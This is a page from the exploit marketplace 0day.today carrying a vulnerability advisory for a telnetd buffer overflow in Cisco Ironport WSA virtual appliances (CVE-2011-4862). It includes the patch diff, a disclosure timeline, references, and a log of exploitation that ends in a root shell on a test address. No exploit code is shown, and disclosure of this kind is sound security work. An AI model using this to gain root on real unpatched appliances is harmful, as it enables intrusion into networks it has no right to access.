0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco Ironport WSA telnetd Remote Code Execution Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Cisco Ironport WSA Telnetd Remote Code Execution Vulnerability
Vendor: Cisco
Product web page: http://www.cisco.com
Affected version: Cisco Ironport WSA - AsyncOS 8.0.5 for Web build 075
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: CVE-2011-4862
CVSS Score: 7.6
Impact: Unauthenticated Remote Code Execution with elevated privileges
Description: The Cisco Ironport WSA virtual appliances are vulnerable to an old FreeBSD telnetd encryption Key ID buffer overflow which allows remote attackers to execute arbitrary code (CVE-2011-4862).
Cisco WSA Virtual appliances have the vulnerable telnetd daemon enabled by default.
diff --git a/ChangeLog b/ChangeLog
index dd381d1..f4e4457 100644
--- a/ChangeLog
+++ b/ChangeLog
@@ -1,3 +1,8 @@
+2011-12-25 Alfred M. Szmidt <ams@gnu.org>
+
+ * libtelnet/encrypt.c (encrypt_keyid): Make sure that LEN never is
+ greater than MAXKEYLEN.
+
2011-12-22 Mats Erik Andersson <gnu@gisladisker.se>
* libinetutils/setsig.c (setsig) [HAVE_SIGACTION]: Initialize
diff --git a/libtelnet/encrypt.c b/libtelnet/encrypt.c
index 06827d9..abfa6d4 100644
--- a/libtelnet/encrypt.c
+++ b/libtelnet/encrypt.c
@@ -796,6 +796,9 @@ encrypt_keyid (kp, keyid, len)
int dir = kp->dir;
register int ret = 0;
+ if (len > MAXKEYLEN)
+ len = MAXKEYLEN;
+
if (!(ep = (*kp->getcrypt) (*kp->modep)))
{
if (len == 0)
Trying 192.168.0.160...
Connected to 192.168.0.160.
Escape character is '^]'.
[+] Exploiting 192.168.0.160, telnetd rulez!
[+] Target OS - FreeBSD 8.2 amd64
[*] Enjoy your shell
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 10:49:50 PDT 2014 auto-build@vm10bsd0266.eng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
Disclosure Timeline
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
22-10-2014: Public Disclosure
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862
http://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport
# 0day.today [2024-11-16] #